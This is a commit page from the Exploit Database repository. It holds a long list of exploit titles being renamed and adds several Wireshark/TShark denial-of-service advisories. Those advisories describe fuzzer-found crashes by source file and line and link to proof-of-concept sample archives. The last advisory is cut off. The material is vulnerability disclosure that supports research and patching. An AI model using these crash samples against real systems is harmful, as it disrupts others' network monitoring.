DB: 2016-08-03
7 new exploits Real Server 7/8/9 - Remote Root Exploit (Windows & Linux) Real Server 7/8/9 - Remote Root Exploit (Windows / Linux) Apache mod_gzip (with debug_mode) <= 1.2.26.1a - Remote Exploit Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit BSD & Linux - umount Local Root Exploit BSD & Linux umount - Local Root Exploit BSD & Linux - lpr Command Local Root Exploit BSD & Linux lpr - Local Root Exploit Battlefield 1942 <= 1.6.19 + Vietnam 1.2 - Broadcast Client Crash Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash PHP 4.3.9 & phpBB 2.x - unserialize() Remote Exploit (compiled) PHP 4.3.9 + phpBB 2.x - unserialize() Remote Exploit (Compiled) Soldier of Fortune 2 <= 1.03 - 'cl_guid' Server Crash Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash Download Center Lite (DCL) <= 1.5 - Remote File Inclusion Download Center Lite (DCL) 1.5 - Remote File Inclusion Linux Mandrake 10.2 - cdrdao Local Root Exploit (unfixed) cdrdao (Mandrake 10.2) - Local Root Exploit MyBulletinBoard (MyBB) <= 1.00 RC4 - SQL Injection Exploit MyBulletinBoard (MyBB) 1.00 RC4 - SQL Injection Exploit e107 <= 0.617 - XSS Remote Cookie Disclosure Exploit e107 0.617 - XSS Remote Cookie Disclosure Exploit MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit MyBulletinBoard (MyBB) 1.00 RC4 SQL Injection Exploit F-Secure Internet Gatekeeper for Linux < 2.15.484 - Local Root Exploit F-Secure Internet Gatekeeper for Linux < 2.15.484 (and Gateway < 2.16) - Local Root Exploit MyBulletinBoard (MyBB) <= 1.03 - Multiple SQL Injection Exploit MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injection Exploit MyBulletinBoard (MyBB) <= 1.03 - (misc.php COMMA) SQL Injection MyBulletinBoard (MyBB) 1.03 - (misc.php COMMA) SQL Injection MyBulletinBoard (MyBB) <= 1.04 - (misc.php COMMA) SQL Injection (2) MyBulletinBoard (MyBB) 1.04 - (misc.php COMMA) SQL Injection (2) Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities MyBulletinBoard (MyBB) <= 1.1.3 - (usercp.php) Create Admin Exploit MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit DZCP (deV!L_z Clanportal) <= 1.34 - (id) SQL Injection Exploit DZCP (deV!L_z Clanportal) 1.34 - (id) SQL Injection Exploit Invision Power Board 2.1 <= 2.1.6 - SQL Injection Exploit Invision Power Board 2.1 <= 2.1.6 - SQL Injection Exploit (1) MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit MyBulletinBoard (MyBB) 1.1.5 - (CLIENT-IP) SQL Injection Exploit PHP Live! <= 3.2.1 - (help.php) Remote Inclusion PHP Live! 3.2.1 - (help.php) Remote Inclusion Les Visiteurs (Visitors) <= 2.0 - (config.inc.php) File Include Les Visiteurs (Visitors) 2.0 - (config.inc.php) File Include Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Electronic Engineering Tool (EE TOOL) 0.4.1 File Include DZCP (deV!L_z Clanportal) <= 1.3.6 - Arbitrary File Upload DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload Tucows Client Code Suite (CSS) <= 1.2.1015 File Include Tucows Client Code Suite (CSS) 1.2.1015 File Include KDE 3.5 - (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit KDE 3.5 - (libkhtml) 4.2.0 / Unhandled HTML Parse Exception Exploit DZCP (deV!L_z Clanportal) <= 1.4.5 - Remote File Disclosure DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure McAfee VirusScan for Mac (Virex) <= 7.7 - Local Root Exploit McAfee VirusScan for Mac (Virex) 7.7 - Local Root Exploit WEBO (Web Organizer) <= 1.0 - (baseDir) Remote File Inclusion WEBO (Web Organizer) 1.0 - (baseDir) Remote File Inclusion Net Portal Dynamic System (NPDS) <= 5.10 - Remote Code Execution Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution Katalog Plyt Audio (pl) <= 1.0 - SQL Injection Exploit Katalog Plyt Audio (pl) 1.0 - SQL Injection Exploit study planner (studiewijzer) <= 0.15 - Remote File Inclusion study planner (studiewijzer) 0.15 - Remote File Inclusion MyBulletinBoard (MyBB) <= 1.2.3 - Remote Code Execution Exploit MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution Exploit MyBulletinBoard (MyBB) <= 1.2.2 - (CLIENT-IP) SQL Injection Exploit MyBulletinBoard (MyBB) 1.2.2 - (CLIENT-IP) SQL Injection Exploit MyBulletinBoard (MyBB) <= 1.2.5 calendar.php Blind SQL Injection Exploit MyBulletinBoard (MyBB) 1.2.5 calendar.php Blind SQL Injection Exploit Net Portal Dynamic System (NPDS) <= 5.10 - Remote Code Execution (2) Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2) LAN Management System (LMS) <= 1.9.6 - Remote File Inclusion Exploit LAN Management System (LMS) 1.9.6 - Remote File Inclusion Exploit Ripe Website Manager (CMS) <= 0.8.9 - Remote File Inclusion Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion Simple PHP Blog (sphpblog) <= 0.5.1 - Multiple Vulnerabilities Simple PHP Blog (sphpblog) 0.5.1 - Multiple Vulnerabilities TaskFreak! <= 0.6.1 - SQL Injection TaskFreak! 0.6.1 - SQL Injection MyBulletinBoard (MyBB) <= 1.2.10 - Remote Code Execution Exploit mybulletinboard (mybb) <= 1.2.10 - Multiple Vulnerabilities MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution Exploit mybulletinboard (mybb) 1.2.10 - Multiple Vulnerabilities MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit MyBulletinBoard (MyBB) 1.2.11 - private.php SQL Injection Exploit PHP Live! <= 3.2.2 - (questid) SQL Injection (1) PHP Live! 3.2.2 - (questid) SQL Injection (1) Web Group Communication Center (WGCC) <= 1.0.3 - SQL Injection Web Group Communication Center (WGCC) 1.0.3 - SQL Injection C6 Messenger ActiveX Remote Download & Execute Exploit C6 Messenger ActiveX - Remote Download & Execute Exploit eLineStudio Site Composer (ESC) <= 2.6 - Multiple Vulnerabilities eLineStudio Site Composer (ESC) 2.6 - Multiple Vulnerabilities Simple PHP Blog (SPHPBlog) <= 0.5.1 Code Execution Exploit Simple PHP Blog (SPHPBlog) 0.5.1 Code Execution Exploit MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit (2) MyBulletinBoard (MyBB) 1.2.11 - private.php SQL Injection Exploit (2) DZCP (deV!L_z Clanportal) <= 1.4.9.6 - Blind SQL Injection Exploit DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection Exploit Amaya Web Editor XML and HTML parser Vulnerabilities Amaya Web Editor - XML and HTML parser Vulnerabilities CMS WEBjump! Multiple SQL Injection CMS WEBjump! - Multiple SQL Injection RQms (Rash) <= 1.2.2 - Multiple SQL Injection RQms (Rash) 1.2.2 - Multiple SQL Injection Online Grades & Attendance 3.2.6 Credentials Changer SQL Exploit Online Grades & Attendance 3.2.6 - Credentials Changer SQL Exploit Apple Safari & Quicktime Denial of Service Apple Safari & Quicktime - Denial of Service AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (SEH) AudioPLUS 2.00.215 - (.lst / .m3u) Local Buffer Overflow (SEH) PHP Live! <= 3.2.2 - (questid) SQL Injection (2) PHP Live! 3.2.2 - (questid) SQL Injection (2) TwonkyMedia Server 4.4.17 & <= 5.0.65 - XSS TwonkyMedia Server 4.4.17 / 5.0.65 - XSS Adobe Shockwave 11.5.1.601 Player Multiple Code Execution Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution NAS Uploader 1.0 & 1.5 - Remote File Upload NAS Uploader 1.0 / 1.5 - Remote File Upload PlayMeNow 7.3 & 7.4 - Buffer Overflow (Metasploit) PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit) Nuked KLan 1.7.7 & <= SP4 DoS Nuked KLan 1.7.7 & SP4 DoS Aqua Real 1.0 & 2.0 - Local Crash PoC Aqua Real 1.0 / 2.0 - Local Crash PoC FreePBX 2.5.x < 2.6.0 - Permanent Cross-Site Scripting (XSS) FreePBX 2.5.x < 2.6.0 - Permanent Cross-Site Scripting Ipswitch IMAIL 11.01 reversible encryption + weak ACL Ipswitch IMAIL 11.01 - reversible encryption + weak ACL justVisual 2.0 - (index.php) <= LFI justVisual 2.0 - (index.php) LFI Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC Simple Machines Forum (SMF) 1.1.8 - (avatar) Remote PHP File Execute PoC SafeSHOP 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting (XSS) McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting Local Glibc shared library (.so) <= 2.11.1 Exploit Local Glibc shared library (.so) 2.11.1 Exploit Safari 4.0.3 & 4.0.4 - Stack Exhaustion Safari 4.0.3 / 4.0.4 - Stack Exhaustion Apache Axis2 administration console - Cross-Site Scripting (XSS) (Authenticated) Apache Axis2 administration console - (Authenticated) Cross-Site Scripting CubeCart PHP (shipkey parameter) <= 4.3.x - SQL Injection CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection Joomla Health & Fitness Stats Persistent XSS Joomla Health & Fitness Stats - Persistent XSS PunBB 1.3.4 & Pun_PM 1.2.6 - Remote Blind SQL Injection Exploit PunBB 1.3.4 / Pun_PM 1.2.6 - Remote Blind SQL Injection Exploit MyIT CRM - Multiple Cross-Site Scripting (XSS) MyIT CRM - Multiple Cross-Site Scripting Adobe Dreamweaver CS5 <= 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll) Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll) Avast! <= 5.0.594 - license files DLL Hijacking Exploit (mfc90loc.dll) Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit BlogBird Platform Multiple XSS Vulnerabilities BlogBird Platform - Multiple XSS Vulnerabilities Joomla Component (btg_oglas) HTML & XSS Injection Joomla Component (btg_oglas) - HTML / XSS Injection Lotus CMS Fraise 3.0 - LFI & Remote Code Execution Exploit Lotus CMS Fraise 3.0 - LFI / Remote Code Execution Exploit Novell ZenWorks 10 & 11 - TFTPD Remote Code Execution Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (1) CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1) CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (2) CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (2) CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (3) CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (3) CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow SmarterMail 7.3 & 7.4 - Multiple Vulnerabilities SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit OpenSLP 1.2.1 / < 1647 trunk - Denial of Service Exploit ScadaTEC ModbusTagServer & ScadaPhone (.zip) Buffer Overflow Exploit (0Day) ScadaTEC ModbusTagServer & ScadaPhone - (.zip) Buffer Overflow Exploit (0Day) MARINET CMS (room.php) <= Blind SQL MARINET CMS (room.php) Blind SQL phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection (Metasploit) phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit) ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin & Delete Article) ContaoCMS (aka TYPOlight) 2.11 - CSRF (Delete Admin / Delete Article) Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 - Remote Buffer Overflow Ricoh DC Software DL-10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow Simple PHP Agenda 2.2.8 - CSRF (Add Admin & Add Event) Simple PHP Agenda 2.2.8 - CSRF (Add Admin / Add Event) SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption SumatraPDF 2.0.1 - (.chm / .mobi) Memory Corruption Dolibarr ERP & CRM 3 Post-Auth OS Command Injection Dolibarr ERP & CRM OS Command Injection Dolibarr ERP & CRM 3 - Post-Auth OS Command Injection Dolibarr ERP & CRM - OS Command Injection Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (1) Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (2) Microsoft Data Access Components (MDAC) 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (1) Microsoft Data Access Components (MDAC) 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (2) sflog! <= 1.00 - Multiple Vulnerabilities sflog! 1.00 - Multiple Vulnerabilities Inter7 vpopmail (vchkpw) <= 3.4.11 - Buffer Overflow Inter7 vpopmail (vchkpw) 3.4.11 - Buffer Overflow White Label CMS 1.5 - CSRF & Persistent XSS White Label CMS 1.5 - CSRF / Persistent XSS AIX 3.x/4.x & Windows 95/98/2000/NT 4 & SunOS 5 gethostbyname() - Buffer Overflow AIX 3.x/4.x / Windows 95/98/2000/NT 4 / SunOS 5 gethostbyname() - Buffer Overflow gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference gdb (GNU debugger) 7.5.1NULL Pointer Dereference Adam Webb NukeJokes 1.7/2.0 Module Multiple Parameter XSS Adam Webb NukeJokes 1.7/2.0 - Module Multiple Parameter XSS Polycom HDX Telnet Authorization Bypass (Metasploit) Polycom HDX - Telnet Authorization Bypass (Metasploit) Joomla! <= 3.0.2 - (highlight.php) PHP Object Injection Joomla! 3.0.2 - (highlight.php) PHP Object Injection Joomla! <= 3.0.3 (remember.php) - PHP Object Injection Joomla! 3.0.3 (remember.php) - PHP Object Injection Active Auction House Default.ASP Multiple SQL Injection Active Auction House - Default.ASP Multiple SQL Injection Aenovo Multiple Unspecified Cross-Site Scripting Vulnerabilities Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities Alisveristr E-commerce Login Multiple SQL Injection Alisveristr E-commerce Login - Multiple SQL Injection Cline Communications Multiple SQL Injection Cline Communications - Multiple SQL Injection Andy Mack 35mm Slide Gallery 6.0 popup.php Multiple Parameter XSS Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter XSS Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow Apple Safari 6.0.1 for iOS 6.0 / OS X 10.7/8 - Heap Buffer Overflow AIOCP 1.3.x cp_forum_view.php Multiple Parameter XSS AIOCP 1.3.x - cp_forum_view.php Multiple Parameter XSS AIOCP 1.3.x cp_news.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_news.php Multiple Parameter SQL Injection AIOCP 1.3.x cp_newsletter.php Multiple Parameter SQL Injection AIOCP 1.3.x cp_links.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_newsletter.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_links.php Multiple Parameter SQL Injection AIOCP 1.3.x cp_show_ec_products.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_show_ec_products.php Multiple Parameter SQL Injection 20/20 Applications Data Shed 1.0 listings.asp Multiple Parameter SQL Injection 20/20 Applications Data Shed 1.0 - listings.asp Multiple Parameter SQL Injection ClickContact Default.ASP Multiple SQL Injection ClickContact - Default.ASP Multiple SQL Injection Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Onpub CMS 1.4 / 1.5 - Multiple SQL Injection Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution Exploit Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) ClientExec 3.0 Index.php Multiple Cross-Site Scripting Vulnerabilities ClientExec 3.0 - Index.php Multiple Cross-Site Scripting Vulnerabilities AbleDesign MyCalendar 2.20.3 Index.php Multiple Cross-Site Scripting Vulnerabilities AbleDesign MyCalendar 2.20.3 - Index.php Multiple Cross-Site Scripting Vulnerabilities AlstraSoft Affiliate Network Pro 8.0 merchants/index.php Multiple Parameter XSS AlstraSoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter XSS File(1) <= 4.13 Command File_PrintF Integer Underflow File(1) 4.13 Command File_PrintF Integer Underflow ACDSee 9.0 Photo Manager Multiple BMP Denial of Service Vulnerabilities ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities Ahhp Portal Page.php Multiple Remote File Inclusion Ahhp Portal - Page.php Multiple Remote File Inclusion Apple QuickTime 7.1.5 Information Disclosure and Multiple Code Execution Vulnerabilities Apple QuickTime 7.1.5 - Information Disclosure / Multiple Code Execution Vulnerabilities OpenBase 10.0.x - (Buffer Overflow & Remote Command Execution) Multiple Vulnerabilities OpenBase 10.0.x - Buffer Overflow / Remote Command Execution AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities Absolute News Manager .NET 5.1 xlaabsolutenm.aspx Multiple Parameter SQL Injection Absolute News Manager .NET 5.1 - xlaabsolutenm.aspx Multiple Parameter SQL Injection Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution and Security Vulnerabilities Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities HPSystem Management Homepage (SMH) <= 2.1.12 - 'message.php' Cross-Site Scripting HPSystem Management Homepage (SMH) 2.1.12 - 'message.php' Cross-Site Scripting Apple iPhone 1.1.4/2.0 and iPod 1.1.4/2.0 touch Safari WebKit 'alert()' Function Remote Denial of Service Apple iPhone 1.1.4/2.0 and iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service 3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities 3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Security Vulnerabilities AlmondSoft Multiple Classifieds Products index.php replid Parameter SQL Injection AlmondSoft Multiple Classifieds Products index.php Multiple Parameter XSS AlmondSoft Multiple Classifieds Products - index.php replid Parameter SQL Injection AlmondSoft Multiple Classifieds Products - index.php Multiple Parameter XSS Linux Kernel 2.6.x (2.6.0 <= 2.6.31) - 'pipe.c' Local Privilege Escalation (1) Linux Kernel 2.6.0 <= 2.6.31 - 'pipe.c' Local Privilege Escalation (1) CMS Source Multiple Input Validation Vulnerabilities CMS Source - Multiple Input Validation Vulnerabilities 123 Flash Chat = Multiple Security Vulnerabilities 123 Flash Chat - Multiple Security Vulnerabilities Pimcore 3.0 & 2.3.0 CMS - SQL Injection Pimcore 3.0 / 2.3.0 CMS - SQL Injection Apple Mac OS X 10.6.5 And iOS 4.3.3 Mail Denial of Service Apple Mac OS X 10.6.5 / iOS 4.3.3 Mail - Denial of Service CmyDocument Multiple Cross-Site Scripting Vulnerabilities CmyDocument - Multiple Cross-Site Scripting Vulnerabilities OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS) OTRS < 3.1.x / < 3.2.x / < 3.3.x - Stored Cross-Site Scripting OYO File Manager 1.1 (iOS & Android) - Multiple Vulnerabilities OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities Airdroid iOS_ Android & Win 3.1.3 - Persistent Airdroid iOS / Android / Win 3.1.3 - Persistent SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit Air Drive Plus Multiple Input Vallidation Vulnerabilities Air Drive Plus - Multiple Input Vallidation Vulnerabilities Collabtive Multiple Security Vulnerabilities Collabtive - Multiple Security Vulnerabilities Open Upload 0.4.2 - (Add Admin) CSRF Wireshark 1.12.0 to 1.12.12 - NDS Dissector Denial of Service Wireshark 2.0.0 to 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service Wireshark 2.0.0 to 2.0.4 - CORBA IDL Dissectors Denial of Service Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - PacketBB Dissector Denial of Service Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service
This commit is contained in:
Offensive Security
parent
1b40ae09d7
commit
75085bf1d7
8 changed files with 460 additions and 154 deletions
31
platforms/multiple/dos/40194.txt
Executable file
31
platforms/multiple/dos/40194.txt
Executable file
|
|
@ -0,0 +1,31 @@
|
|||
Sample generated with AFL
|
||||
|
||||
Build Information:
|
||||
TShark 1.12.9 (v1.12.9-0-gfadb421 from (HEAD)
|
||||
|
||||
Copyright 1998-2015 Gerald Combs <gerald@wireshark.org> and contributors.
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
|
||||
Compiled (64-bit) with GLib 2.48.1, with libpcap, with libz 1.2.8, with POSIX
|
||||
capabilities (Linux), with libnl 3, without SMI, with c-ares 1.11.0, without
|
||||
Lua, without Python, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos,
|
||||
with GeoIP.
|
||||
|
||||
Running on Linux 4.6.2-1-ARCH, with locale en_US.utf8, with libpcap version
|
||||
1.7.4, with libz 1.2.8.
|
||||
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz
|
||||
|
||||
Built using clang 4.2.1 Compatible Clang 3.8.0 (tags/RELEASE_380/final).
|
||||
--
|
||||
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)
|
||||
|
||||
There is a bug in dissect_nds_request located in epan/dissectors/packet-ncp2222.inc.
|
||||
|
||||
dissect_nds_request attempts to call ptvcursor_free() near packet-ncp2222.inc:11806 using the variable ptvc that is set to null at the start of dissect_nds_request. Using the attached sample, the only place ptvc could be set (~ncp2222.inc:11618) is never executed and thus ptvc remains a null pointer.
|
||||
|
||||
Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40194.zip
|
||||
25
platforms/multiple/dos/40195.txt
Executable file
25
platforms/multiple/dos/40195.txt
Executable file
|
|
@ -0,0 +1,25 @@
|
|||
Build Information:
|
||||
TShark (Wireshark) 2.0.2 (SVN Rev Unknown from unknown)
|
||||
|
||||
Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
|
||||
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
|
||||
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
|
||||
with libz 1.2.8, with GLib 2.48.0, with SMI 0.4.8, with c-ares 1.10.0, with Lua
|
||||
5.2, with GnuTLS 3.4.10, with Gcrypt 1.6.5, with MIT Kerberos, with GeoIP.
|
||||
|
||||
Running on Linux 4.4.0-22-generic, with locale en_GB.UTF-8, with libpcap version
|
||||
1.7.4, with libz 1.2.8, with GnuTLS 3.4.10, with Gcrypt 1.6.5.
|
||||
Intel Core Processor (Haswell) (with SSE4.2)
|
||||
|
||||
Built using gcc 5.3.1 20160407.
|
||||
|
||||
--
|
||||
Fuzzed PCAP eats large amounts of memory ( >4GB ) with a single UDP packet on tshark 2.0.2 and a recent build from repository
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40195.zip
|
||||
|
||||
32
platforms/multiple/dos/40197.txt
Executable file
32
platforms/multiple/dos/40197.txt
Executable file
|
|
@ -0,0 +1,32 @@
|
|||
Sample generated by AFL
|
||||
|
||||
Build Information:
|
||||
TShark 1.12.9 (v1.12.9-0-gfadb421 from (HEAD)
|
||||
|
||||
Copyright 1998-2015 Gerald Combs <gerald@wireshark.org> and contributors.
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
|
||||
Compiled (64-bit) with GLib 2.48.1, with libpcap, with libz 1.2.8, with POSIX
|
||||
capabilities (Linux), with libnl 3, without SMI, with c-ares 1.11.0, without
|
||||
Lua, without Python, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos,
|
||||
with GeoIP.
|
||||
|
||||
Running on Linux 4.6.2-1-ARCH, with locale en_US.utf8, with libpcap version
|
||||
1.7.4, with libz 1.2.8.
|
||||
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz
|
||||
--
|
||||
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)
|
||||
|
||||
The attached sample evokes a divide-by-zero error in the dissect_pbb_tlvblock() function at packet-packetbb.c:289.
|
||||
|
||||
The variable of interest seems to be 'c' which is set at packet-packetbb.c:285 using two other variables and an addition. When c is zero, the expression "length/c" at packet-packetbb.c:289 results in a divide-by-zero error.
|
||||
|
||||
Divide-by-zero has been observed when sample is parsed by tshark versions 1.12.8, 1.12.9, 1.12.10, 1.12.12, and 2.0.4 among others.
|
||||
|
||||
Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40197.zip
|
||||
|
||||
32
platforms/multiple/dos/40198.txt
Executable file
32
platforms/multiple/dos/40198.txt
Executable file
|
|
@ -0,0 +1,32 @@
|
|||
Sample generated with AFL
|
||||
|
||||
Build Information:
|
||||
TShark (Wireshark) 2.0.4
|
||||
|
||||
Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
|
||||
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
|
||||
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
|
||||
with libz 1.2.8, with GLib 2.48.1, without SMI, with c-ares 1.11.0, with Lua
|
||||
5.2, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos, with GeoIP.
|
||||
|
||||
Running on Linux 4.6.3-1-ARCH, with locale en_US.utf8, with libpcap version
|
||||
1.7.4, with libz 1.2.8, with GnuTLS 3.4.13, with Gcrypt 1.7.1.
|
||||
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz (with SSE4.2)
|
||||
|
||||
Built using gcc 6.1.1 20160602.
|
||||
--
|
||||
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)
|
||||
|
||||
This infinite loop is caused by an offset of 0 being returned by wkh_content_disposition(). This offset of 0 prevents the while loop using "offset < tvb_len" from returning and results in an infinite loop.
|
||||
|
||||
This issue has been observed in both tshark 1.12.x and 2.0.x.
|
||||
|
||||
Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40198.zip
|
||||
|
||||
87
platforms/multiple/dos/40199.txt
Executable file
87
platforms/multiple/dos/40199.txt
Executable file
|
|
@ -0,0 +1,87 @@
|
|||
Sample PCAP
|
||||
|
||||
Build Information:
|
||||
TShark (Wireshark) 2.0.2 (SVN Rev Unknown from unknown)
|
||||
|
||||
Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
|
||||
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
|
||||
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
|
||||
with libz 1.2.8, with GLib 2.48.0, with SMI 0.4.8, with c-ares 1.10.0, with Lua
|
||||
5.2, with GnuTLS 3.4.10, with Gcrypt 1.6.5, with MIT Kerberos, with GeoIP.
|
||||
|
||||
Running on Linux 4.4.0-22-generic, with locale en_GB.UTF-8, with libpcap version
|
||||
1.7.4, with libz 1.2.8, with GnuTLS 3.4.10, with Gcrypt 1.6.5.
|
||||
Intel Core Processor (Haswell) (with SSE4.2)
|
||||
|
||||
Built using gcc 5.3.1 20160407.
|
||||
|
||||
--
|
||||
